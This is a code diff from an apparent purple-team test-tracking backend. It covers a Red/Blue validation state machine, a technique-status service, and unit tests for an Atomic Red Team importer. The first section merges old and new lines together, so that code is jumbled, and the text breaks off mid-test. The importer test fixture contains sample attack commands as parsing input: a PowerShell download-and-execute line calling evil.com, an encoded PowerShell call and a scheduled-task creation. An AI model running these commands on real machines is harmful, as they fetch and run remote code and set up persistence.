"""Service for recalculating the global status of a Technique """Service for recalculating the global status of a Technique
based on the state and result of its associated tests.""" based on the state and result of its associated tests.
V2 rules account for dual Red/Blue validation and use
``detection_result`` (filled by Blue Team) instead of the legacy
``result`` field.
"""
from sqlalchemy.orm import Session from sqlalchemy.orm import Session
from app.models.enums import TechniqueStatus from app.models.enums import TechniqueStatus, TestState
from app.models.technique import Technique from app.models.technique import Technique
def recalculate_technique_status(db: Session, technique: Technique) -> None: def recalculate_technique_status(db: Session, technique: Technique) -> None:
"""Recompute ``technique.status_global`` from its tests and commit. """Recompute ``technique.status_global`` from its tests and commit.
Rules Rules (v2)
----- ----------
- No tests → ``not_evaluated`` 1. No tests → ``not_evaluated``
- Any test not yet ``validated`` → ``in_progress`` 2. All tests ``validated`` → look at detection results:
- All validated and all ``detected`` → ``validated`` - All ``detected`` → ``validated``
- All validated and any ``partially_detected`` → ``partial`` - Any ``partially_detected`` → ``partial``
- Otherwise → ``not_covered`` - Otherwise → ``not_covered``
3. Some tests ``validated``, others still in progress → ``partial``
4. All tests in intermediate states (no validated) → ``in_progress``
""" """
tests = technique.tests tests = technique.tests
if not tests: if not tests:
technique.status_global = TechniqueStatus.not_evaluated technique.status_global = TechniqueStatus.not_evaluated
elif any(t.state != "validated" for t in tests): elif all(t.state == TestState.validated for t in tests):
technique.status_global = TechniqueStatus.in_progress # All validated — inspect detection results
else: results = [t.detection_result for t in tests if t.detection_result]
results = [t.result for t in tests] if results and all(str(r) == "detected" or r == "detected" for r in results):
if all(r == "detected" for r in results):
technique.status_global = TechniqueStatus.validated technique.status_global = TechniqueStatus.validated
elif any(r == "partially_detected" for r in results): elif any(str(r) == "partially_detected" or r == "partially_detected" for r in results):
technique.status_global = TechniqueStatus.partial technique.status_global = TechniqueStatus.partial
else: else:
technique.status_global = TechniqueStatus.not_covered technique.status_global = TechniqueStatus.not_covered
elif any(t.state == TestState.validated for t in tests):
technique.status_global = TechniqueStatus.partial
else:
technique.status_global = TechniqueStatus.in_progress
db.commit() db.commit()
@@ -0,0 +1,285 @@
"""Test workflow service — state-machine transitions for the Red/Blue validation flow.
Controls which state transitions are valid and exposes high-level helpers
for each step in the test lifecycle:
draft → red_executing → blue_evaluating → in_review → validated / rejected
rejected → draft
Every public function validates the transition, mutates the test, writes an
audit-log entry, and commits the session.
"""
from datetime import datetime
from fastapi import HTTPException, status
from sqlalchemy.orm import Session
from app.models.enums import TestState
from app.models.test import Test
from app.models.user import User
from app.services.audit_service import log_action
# ---------------------------------------------------------------------------
# Valid transition map
# ---------------------------------------------------------------------------
VALID_TRANSITIONS: dict[TestState, list[TestState]] = {
TestState.draft: [TestState.red_executing],
TestState.red_executing: [TestState.blue_evaluating],
TestState.blue_evaluating: [TestState.in_review],
TestState.in_review: [TestState.validated, TestState.rejected],
TestState.rejected: [TestState.draft],
TestState.validated: [], # terminal state
}
# ---------------------------------------------------------------------------
# Core helpers
# ---------------------------------------------------------------------------
def can_transition(test: Test, target_state: TestState) -> bool:
"""Return *True* if moving *test* to *target_state* is allowed."""
current = test.state if isinstance(test.state, TestState) else TestState(test.state)
return target_state in VALID_TRANSITIONS.get(current, [])
def transition_state(
db: Session,
test: Test,
target_state: TestState,
user: User,
*,
action_name: str = "transition_state",
extra_details: dict | None = None,
) -> Test:
"""Validate and perform a state transition, log it, and commit.
Raises :class:`~fastapi.HTTPException` 400 when the transition is invalid.
"""
if not can_transition(test, target_state):
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail=(
f"Invalid transition: cannot move from "
f"'{test.state.value if isinstance(test.state, TestState) else test.state}' "
f"to '{target_state.value}'"
),
)
previous_state = test.state.value if isinstance(test.state, TestState) else test.state
test.state = target_state
db.flush()
details: dict = {
"previous_state": previous_state,
"new_state": target_state.value,
"test_name": test.name,
"technique_id": str(test.technique_id),
}
if extra_details:
details.update(extra_details)
log_action(
db,
user_id=user.id,
action=action_name,
entity_type="test",
entity_id=test.id,
details=details,
)
return test
# ---------------------------------------------------------------------------
# Lifecycle convenience functions
# ---------------------------------------------------------------------------
def start_execution(db: Session, test: Test, user: User) -> Test:
"""Move from ``draft`` → ``red_executing``.
Typically called by a **red_tech** when they begin the attack.
"""
test = transition_state(
db, test, TestState.red_executing, user,
action_name="start_execution",
)
test.execution_date = datetime.utcnow()
db.commit()
return test
def submit_red_evidence(db: Session, test: Test, user: User) -> Test:
"""Move from ``red_executing`` → ``blue_evaluating``.
Called by **red_tech** once they have finished documenting the attack.
"""
test = transition_state(
db, test, TestState.blue_evaluating, user,
action_name="submit_red_evidence",
)
db.commit()
return test
def submit_blue_evidence(db: Session, test: Test, user: User) -> Test:
"""Move from ``blue_evaluating`` → ``in_review``.
Called by **blue_tech** once they have finished documenting detection.
"""
test = transition_state(
db, test, TestState.in_review, user,
action_name="submit_blue_evidence",
)
db.commit()
return test
def validate_as_red_lead(
db: Session,
test: Test,
user: User,
validation_status: str,
notes: str | None = None,
) -> Test:
"""Record Red Lead's validation decision.
*validation_status* must be ``"approved"`` or ``"rejected"``.
After recording the decision, :func:`check_dual_validation` is called
to potentially advance the test to ``validated`` or ``rejected``.
"""
if test.state not in (TestState.in_review,):
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail=f"Cannot validate red side while test is in '{test.state.value if isinstance(test.state, TestState) else test.state}' state (must be in_review)",
)
if validation_status not in ("approved", "rejected"):
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail="validation_status must be 'approved' or 'rejected'",
)
now = datetime.utcnow()
test.red_validation_status = validation_status
test.red_validated_by = user.id
test.red_validated_at = now
test.red_validation_notes = notes
log_action(
db,
user_id=user.id,
action="validate_as_red_lead",
entity_type="test",
entity_id=test.id,
details={
"validation_status": validation_status,
"notes": notes,
"technique_id": str(test.technique_id),
},
)
check_dual_validation(db, test)
return test
def validate_as_blue_lead(
db: Session,
test: Test,
user: User,
validation_status: str,
notes: str | None = None,
) -> Test:
"""Record Blue Lead's validation decision.
*validation_status* must be ``"approved"`` or ``"rejected"``.
After recording the decision, :func:`check_dual_validation` is called
to potentially advance the test to ``validated`` or ``rejected``.
"""
if test.state not in (TestState.in_review,):
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail=f"Cannot validate blue side while test is in '{test.state.value if isinstance(test.state, TestState) else test.state}' state (must be in_review)",
)
if validation_status not in ("approved", "rejected"):
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail="validation_status must be 'approved' or 'rejected'",
)
now = datetime.utcnow()
test.blue_validation_status = validation_status
test.blue_validated_by = user.id
test.blue_validated_at = now
test.blue_validation_notes = notes
log_action(
db,
user_id=user.id,
action="validate_as_blue_lead",
entity_type="test",
entity_id=test.id,
details={
"validation_status": validation_status,
"notes": notes,
"technique_id": str(test.technique_id),
},
)
check_dual_validation(db, test)
return test
def check_dual_validation(db: Session, test: Test) -> Test:
"""Evaluate both leads' decisions and advance the test if both have voted.
- Both **approved** → ``validated``
- Either **rejected** → ``rejected``
- Otherwise no state change (waiting for the other lead).
Commits only when the state actually changes.
"""
red_status = test.red_validation_status
blue_status = test.blue_validation_status
if red_status == "rejected" or blue_status == "rejected":
test.state = TestState.rejected
db.commit()
elif red_status == "approved" and blue_status == "approved":
test.state = TestState.validated
db.commit()
else:
# One side hasn't voted yet — stay in_review, just flush
db.commit()
return test
def reopen_test(db: Session, test: Test, user: User) -> Test:
"""Move a ``rejected`` test back to ``draft``, clearing validation fields.
This allows the teams to redo the test cycle.
"""
test = transition_state(
db, test, TestState.draft, user,
action_name="reopen_test",
)
# Clear dual-validation fields
test.red_validation_status = None
test.red_validated_by = None
test.red_validated_at = None
test.red_validation_notes = None
test.blue_validation_status = None
test.blue_validated_by = None
test.blue_validated_at = None
test.blue_validation_notes = None
db.commit()
return test
+1
View File
@@ -9,6 +9,7 @@ bcrypt==4.0.1
boto3 boto3
apscheduler apscheduler
requests requests
pyyaml
taxii2-client taxii2-client
python-multipart python-multipart
pydantic-settings pydantic-settings
+344
View File
@@ -0,0 +1,344 @@
"""Validation tests for T-106: Test Workflow Service.
Uses mock objects to avoid needing a running database.
The database module is stubbed before any app imports.
"""
import sys
import os
import uuid
from unittest.mock import MagicMock, patch
from types import ModuleType
from datetime import datetime
# ---------------------------------------------------------------------------
# 0. Stub heavy dependencies BEFORE importing any app modules
# ---------------------------------------------------------------------------
# Ensure backend/ is on sys.path
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
# Stub pydantic_settings so config doesn't fail
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs):
pass
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
# Stub app.config
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
# Stub app.database so no real engine is created
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
sys.modules["app.database"] = db_mod
# Stub taxii2client
taxii_v20 = ModuleType("taxii2client.v20")
taxii_v20.Server = MagicMock
sys.modules["taxii2client"] = ModuleType("taxii2client")
sys.modules["taxii2client.v20"] = taxii_v20
# Stub jose
jose_mod = ModuleType("jose")
jose_mod.JWTError = Exception
jose_mod.jwt = MagicMock()
sys.modules["jose"] = jose_mod
# Stub boto3
boto3_mod = ModuleType("boto3")
boto3_mod.client = MagicMock()
sys.modules["boto3"] = boto3_mod
sys.modules["botocore"] = ModuleType("botocore")
sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions")
sys.modules["botocore.exceptions"].ClientError = Exception
# Stub apscheduler
sys.modules["apscheduler"] = ModuleType("apscheduler")
sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers")
sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background")
sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock
sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers")
sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron")
sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock
# ---------------------------------------------------------------------------
# Now we can safely import
# ---------------------------------------------------------------------------
from app.models.enums import TestState
from app.services.test_workflow_service import (
VALID_TRANSITIONS,
can_transition,
transition_state,
start_execution,
submit_red_evidence,
submit_blue_evidence,
validate_as_red_lead,
validate_as_blue_lead,
check_dual_validation,
reopen_test,
)
# We also need HTTPException for assertions
from fastapi import HTTPException
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _make_test(state: TestState = TestState.draft, **kwargs) -> MagicMock:
t = MagicMock()
t.id = uuid.uuid4()
t.name = "Mock Test"
t.technique_id = uuid.uuid4()
t.state = state
t.red_validation_status = kwargs.get("red_validation_status", None)
t.blue_validation_status = kwargs.get("blue_validation_status", None)
t.red_validated_by = None
t.red_validated_at = None
t.red_validation_notes = None
t.blue_validated_by = None
t.blue_validated_at = None
t.blue_validation_notes = None
t.execution_date = None
return t
def _make_user(role: str = "red_tech") -> MagicMock:
user = MagicMock()
user.id = uuid.uuid4()
user.role = role
return user
def _make_db() -> MagicMock:
return MagicMock()
# ---------------------------------------------------------------------------
# 1. draft -> red_executing works
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_draft_to_red_executing(mock_log):
test = _make_test(TestState.draft)
user = _make_user("red_tech")
db = _make_db()
result = start_execution(db, test, user)
assert result.state == TestState.red_executing
assert result.execution_date is not None
db.commit.assert_called()
mock_log.assert_called()
print(" [PASS] Transition draft -> red_executing works")
# ---------------------------------------------------------------------------
# 2. draft -> validated fails (not allowed)
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_draft_to_validated_fails(mock_log):
test = _make_test(TestState.draft)
user = _make_user("admin")
db = _make_db()
try:
transition_state(db, test, TestState.validated, user)
assert False, "Should have raised HTTPException"
except HTTPException as exc:
assert exc.status_code == 400
print(" [PASS] Transition draft -> validated correctly fails")
# ---------------------------------------------------------------------------
# 3. red_executing -> blue_evaluating works
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_red_executing_to_blue_evaluating(mock_log):
test = _make_test(TestState.red_executing)
user = _make_user("red_tech")
db = _make_db()
result = submit_red_evidence(db, test, user)
assert result.state == TestState.blue_evaluating
db.commit.assert_called()
mock_log.assert_called()
print(" [PASS] Transition red_executing -> blue_evaluating works")
# ---------------------------------------------------------------------------
# 4. check_dual_validation -> validated when both approved
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_dual_validation_both_approved(mock_log):
test = _make_test(TestState.in_review)
user_red = _make_user("red_lead")
user_blue = _make_user("blue_lead")
db = _make_db()
validate_as_red_lead(db, test, user_red, "approved", "LGTM")
validate_as_blue_lead(db, test, user_blue, "approved", "Detection OK")
assert test.state == TestState.validated
print(" [PASS] check_dual_validation -> validated when both approved")
# ---------------------------------------------------------------------------
# 5. check_dual_validation -> rejected when one rejects
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_dual_validation_one_rejected(mock_log):
test = _make_test(TestState.in_review)
user_red = _make_user("red_lead")
db = _make_db()
validate_as_red_lead(db, test, user_red, "rejected", "Insufficient evidence")
assert test.state == TestState.rejected
print(" [PASS] check_dual_validation -> rejected when one rejects")
# ---------------------------------------------------------------------------
# 6. reopen_test clears validation fields
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_reopen_clears_validation(mock_log):
test = _make_test(
TestState.rejected,
red_validation_status="rejected",
blue_validation_status="approved",
)
user = _make_user("red_lead")
db = _make_db()
result = reopen_test(db, test, user)
assert result.state == TestState.draft
assert result.red_validation_status is None
assert result.blue_validation_status is None
assert result.red_validated_by is None
assert result.red_validated_at is None
assert result.red_validation_notes is None
assert result.blue_validated_by is None
assert result.blue_validated_at is None
assert result.blue_validation_notes is None
db.commit.assert_called()
print(" [PASS] reopen_test clears validation fields and moves to draft")
# ---------------------------------------------------------------------------
# 7. Every transition generates an audit log
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_transitions_generate_audit_logs(mock_log):
test = _make_test(TestState.draft)
user = _make_user("red_tech")
db = _make_db()
start_execution(db, test, user)
assert mock_log.call_count >= 1
c1 = mock_log.call_count
submit_red_evidence(db, test, user)
assert mock_log.call_count > c1
c2 = mock_log.call_count
submit_blue_evidence(db, test, user)
assert mock_log.call_count > c2
print(" [PASS] Each transition generates an audit log")
# ---------------------------------------------------------------------------
# 8. can_transition correctness
# ---------------------------------------------------------------------------
def test_can_transition_map():
test = _make_test(TestState.draft)
assert can_transition(test, TestState.red_executing) is True
assert can_transition(test, TestState.validated) is False
assert can_transition(test, TestState.blue_evaluating) is False
test.state = TestState.red_executing
assert can_transition(test, TestState.blue_evaluating) is True
assert can_transition(test, TestState.draft) is False
test.state = TestState.blue_evaluating
assert can_transition(test, TestState.in_review) is True
test.state = TestState.in_review
assert can_transition(test, TestState.validated) is True
assert can_transition(test, TestState.rejected) is True
assert can_transition(test, TestState.draft) is False
test.state = TestState.rejected
assert can_transition(test, TestState.draft) is True
test.state = TestState.validated
assert can_transition(test, TestState.draft) is False
assert can_transition(test, TestState.rejected) is False
print(" [PASS] can_transition map is correct")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-106 Validation: Test Workflow Service")
print("=" * 50)
test_draft_to_red_executing()
test_draft_to_validated_fails()
test_red_executing_to_blue_evaluating()
test_dual_validation_both_approved()
test_dual_validation_one_rejected()
test_reopen_clears_validation()
test_transitions_generate_audit_logs()
test_can_transition_map()
print("=" * 50)
print("ALL T-106 validations PASSED!")
+229
View File
@@ -0,0 +1,229 @@
"""Validation tests for T-107: Updated status recalculation service.
Verifies the new logic that considers dual validation and detection_result.
"""
import sys
import os
import uuid
from unittest.mock import MagicMock
from types import ModuleType
# ---------------------------------------------------------------------------
# Stub heavy dependencies
# ---------------------------------------------------------------------------
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
# Only stub if not already stubbed (in case tests run together)
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs):
pass
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
if "app.config" not in sys.modules:
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
if "app.database" not in sys.modules:
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
sys.modules["app.database"] = db_mod
if "taxii2client" not in sys.modules:
sys.modules["taxii2client"] = ModuleType("taxii2client")
taxii_v20 = ModuleType("taxii2client.v20")
taxii_v20.Server = MagicMock
sys.modules["taxii2client.v20"] = taxii_v20
if "jose" not in sys.modules:
jose_mod = ModuleType("jose")
jose_mod.JWTError = Exception
jose_mod.jwt = MagicMock()
sys.modules["jose"] = jose_mod
if "boto3" not in sys.modules:
boto3_mod = ModuleType("boto3")
boto3_mod.client = MagicMock()
sys.modules["boto3"] = boto3_mod
sys.modules["botocore"] = ModuleType("botocore")
sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions")
sys.modules["botocore.exceptions"].ClientError = Exception
if "apscheduler" not in sys.modules:
sys.modules["apscheduler"] = ModuleType("apscheduler")
sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers")
sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background")
sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock
sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers")
sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron")
sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
from app.models.enums import TechniqueStatus, TestState, TestResult
from app.services.status_service import recalculate_technique_status
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _make_test_obj(state, detection_result=None):
"""Create a mock test with the given state and detection_result."""
t = MagicMock()
t.state = state
t.detection_result = detection_result
return t
def _make_technique(tests=None):
"""Create a mock technique."""
technique = MagicMock()
technique.tests = tests or []
technique.status_global = None
return technique
def _make_db():
return MagicMock()
# ---------------------------------------------------------------------------
# 1. Sin tests -> not_evaluated
# ---------------------------------------------------------------------------
def test_no_tests():
technique = _make_technique([])
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.not_evaluated
db.commit.assert_called()
print(" [PASS] No tests -> not_evaluated")
# ---------------------------------------------------------------------------
# 2. Todos validated con detection=detected -> validated
# ---------------------------------------------------------------------------
def test_all_validated_all_detected():
tests = [
_make_test_obj(TestState.validated, TestResult.detected),
_make_test_obj(TestState.validated, TestResult.detected),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.validated
print(" [PASS] All validated, all detected -> validated")
# ---------------------------------------------------------------------------
# 3. Algunos validated, otros en progreso -> partial
# ---------------------------------------------------------------------------
def test_some_validated_some_in_progress():
tests = [
_make_test_obj(TestState.validated, TestResult.detected),
_make_test_obj(TestState.red_executing, None),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.partial
print(" [PASS] Some validated, some in progress -> partial")
# ---------------------------------------------------------------------------
# 4. Todos en estados intermedios -> in_progress
# ---------------------------------------------------------------------------
def test_all_intermediate():
tests = [
_make_test_obj(TestState.red_executing, None),
_make_test_obj(TestState.blue_evaluating, None),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.in_progress
print(" [PASS] All intermediate -> in_progress")
# ---------------------------------------------------------------------------
# 5. Todos validated con detection=not_detected -> not_covered
# ---------------------------------------------------------------------------
def test_all_validated_not_detected():
tests = [
_make_test_obj(TestState.validated, TestResult.not_detected),
_make_test_obj(TestState.validated, TestResult.not_detected),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.not_covered
print(" [PASS] All validated, not_detected -> not_covered")
# ---------------------------------------------------------------------------
# Bonus: All validated with partially_detected -> partial
# ---------------------------------------------------------------------------
def test_all_validated_partially_detected():
tests = [
_make_test_obj(TestState.validated, TestResult.detected),
_make_test_obj(TestState.validated, TestResult.partially_detected),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.partial
print(" [PASS] All validated, partially_detected -> partial")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-107 Validation: Status Service Recalculation")
print("=" * 50)
test_no_tests()
test_all_validated_all_detected()
test_some_validated_some_in_progress()
test_all_intermediate()
test_all_validated_not_detected()
test_all_validated_partially_detected()
print("=" * 50)
print("ALL T-107 validations PASSED!")
+355
View File
@@ -0,0 +1,355 @@
"""Validation tests for T-108: Atomic Red Team Import Service.
Tests the YAML parsing logic and deduplication using synthetic data.
The download test is marked as optional (requires network).
"""
import sys
import os
import uuid
import tempfile
import shutil
from unittest.mock import MagicMock, patch, PropertyMock
from types import ModuleType
from pathlib import Path
# ---------------------------------------------------------------------------
# Stub heavy dependencies
# ---------------------------------------------------------------------------
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs): pass
def __init_subclass__(cls, **kwargs): super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
if "app.config" not in sys.modules:
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
if "app.database" not in sys.modules:
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
sys.modules["app.database"] = db_mod
if "taxii2client" not in sys.modules:
sys.modules["taxii2client"] = ModuleType("taxii2client")
taxii_v20 = ModuleType("taxii2client.v20")
taxii_v20.Server = MagicMock
sys.modules["taxii2client.v20"] = taxii_v20
if "jose" not in sys.modules:
jose_mod = ModuleType("jose")
jose_mod.JWTError = Exception
jose_mod.jwt = MagicMock()
sys.modules["jose"] = jose_mod
if "boto3" not in sys.modules:
boto3_mod = ModuleType("boto3")
boto3_mod.client = MagicMock()
sys.modules["boto3"] = boto3_mod
sys.modules["botocore"] = ModuleType("botocore")
sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions")
sys.modules["botocore.exceptions"].ClientError = Exception
if "apscheduler" not in sys.modules:
sys.modules["apscheduler"] = ModuleType("apscheduler")
sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers")
sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background")
sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock
sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers")
sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron")
sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
import yaml
from app.services.atomic_import_service import (
_parse_yaml_files,
_extract_zip,
import_atomic_red_team,
ATOMIC_RT_ZIP_URL,
)
# ---------------------------------------------------------------------------
# Helpers — create a synthetic atomics directory
# ---------------------------------------------------------------------------
def _create_fake_atomics(tmp_dir: str, techniques: dict[str, list[dict]]) -> Path:
"""Create a fake atomics/ directory with YAML files.
Parameters
----------
techniques : dict
Mapping from technique ID (e.g. "T1059.001") to a list of test dicts.
"""
atomics = Path(tmp_dir) / "atomics"
atomics.mkdir(parents=True, exist_ok=True)
for tech_id, tests in techniques.items():
tech_dir = atomics / tech_id
tech_dir.mkdir(exist_ok=True)
yaml_data = {
"attack_technique": tech_id,
"display_name": f"Technique {tech_id}",
"atomic_tests": tests,
}
yaml_path = tech_dir / f"{tech_id}.yaml"
with open(yaml_path, "w", encoding="utf-8") as fh:
yaml.dump(yaml_data, fh)
return atomics
# ---------------------------------------------------------------------------
# 1. Parsing creates correct TestTemplate-like dicts
# ---------------------------------------------------------------------------
def test_parse_creates_templates():
tmp_dir = tempfile.mkdtemp(prefix="aegis_test_")
try:
atomics = _create_fake_atomics(tmp_dir, {
"T1059.001": [
{
"name": "PowerShell Invoke-Expression",
"description": "Runs a PS command",
"supported_platforms": ["windows"],
"executor": {
"name": "powershell",
"command": "IEX (New-Object Net.WebClient).DownloadString('http://evil.com')",
},
},
{
"name": "PowerShell Base64 Encoded",
"description": "Runs base64-encoded PS",
"supported_platforms": ["windows"],
"executor": {
"name": "powershell",
"command": "powershell -enc ZQBjaA==",
},
},
],
"T1053.005": [
{
"name": "Scheduled Task Creation",
"description": "Creates a scheduled task",
"supported_platforms": ["windows", "linux"],
"executor": {
"name": "command_prompt",
"command": "schtasks /create /tn test /tr calc.exe",
},
},
],
})
results = _parse_yaml_files(atomics)
assert len(results) == 3, f"Expected 3 tests, got {len(results)}"
# Verify atomic_test_id format
ids = {r["atomic_test_id"] for r in results}
assert "T1059.001-0" in ids
assert "T1059.001-1" in ids
assert "T1053.005-0" in ids
# Check source is "atomic_red_team" (via source_url)
for r in results:
assert "atomic-red-team" in r["source_url"]
# Check platforms
for r in results:
if r["technique_id"] == "T1053.005":
assert "windows" in r["platforms"]
assert "linux" in r["platforms"]
print(" [PASS] Parsing creates correct templates with source and valid data")
finally:
shutil.rmtree(tmp_dir, ignore_errors=True)
# ---------------------------------------------------------------------------
# 2. Running twice does not duplicate
# ---------------------------------------------------------------------------
@patch("app.services.atomic_import_service.TestTemplate")
@patch("app.services.atomic_import_service.log_action")
@patch("app.services.atomic_import_service._download_zip")
def test_no_duplicates(mock_download, mock_log, MockTestTemplate):
"""Import twice with same data — second run should skip everything."""
import io
import zipfile
# Make TestTemplate() return a mock each time
MockTestTemplate.side_effect = lambda **kwargs: MagicMock(**kwargs)
# Keep atomic_test_id queryable
MockTestTemplate.atomic_test_id = MagicMock()
MockTestTemplate.atomic_test_id.isnot = MagicMock(return_value=True)
# Build a fake ZIP
tmp_dir = tempfile.mkdtemp(prefix="aegis_test_zip_")
try:
atomics = _create_fake_atomics(
os.path.join(tmp_dir, "atomic-red-team-master"),
{
"T1059.001": [
{
"name": "Test One",
"description": "Desc",
"supported_platforms": ["windows"],
"executor": {"name": "sh", "command": "echo test"},
},
],
},
)
# Create a ZIP from the tmp_dir
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, "w") as zf:
root = Path(tmp_dir)
for file_path in root.rglob("*"):
if file_path.is_file():
arcname = str(file_path.relative_to(root))
zf.write(file_path, arcname)
zip_bytes = zip_buffer.getvalue()
mock_download.return_value = zip_bytes
# --- First import ---
# Mock DB: no existing templates
db = MagicMock()
mock_query = MagicMock()
mock_query.filter.return_value.all.return_value = []
db.query.return_value = mock_query
added_templates = []
def track_add(template):
added_templates.append(template)
db.add.side_effect = track_add
result1 = import_atomic_red_team(db)
assert result1["created"] == 1
assert result1["skipped_existing"] == 0
# --- Second import ---
# Now DB returns the existing template
db2 = MagicMock()
mock_query2 = MagicMock()
# Return the atomic_test_id that was already created
mock_query2.filter.return_value.all.return_value = [("T1059.001-0",)]
db2.query.return_value = mock_query2
added2 = []
db2.add.side_effect = lambda t: added2.append(t)
result2 = import_atomic_red_team(db2)
assert result2["created"] == 0
assert result2["skipped_existing"] == 1
assert len(added2) == 0
print(" [PASS] Running twice does not duplicate templates")
finally:
shutil.rmtree(tmp_dir, ignore_errors=True)
# ---------------------------------------------------------------------------
# 3. Templates mapped correctly to MITRE techniques
# ---------------------------------------------------------------------------
def test_templates_mapped_to_techniques():
tmp_dir = tempfile.mkdtemp(prefix="aegis_test_")
try:
atomics = _create_fake_atomics(tmp_dir, {
"T1059.001": [
{
"name": "Test",
"description": "Desc",
"supported_platforms": ["windows"],
"executor": {"name": "sh", "command": "echo hi"},
},
],
"T1071.001": [
{
"name": "HTTP C2",
"description": "HTTP-based C2",
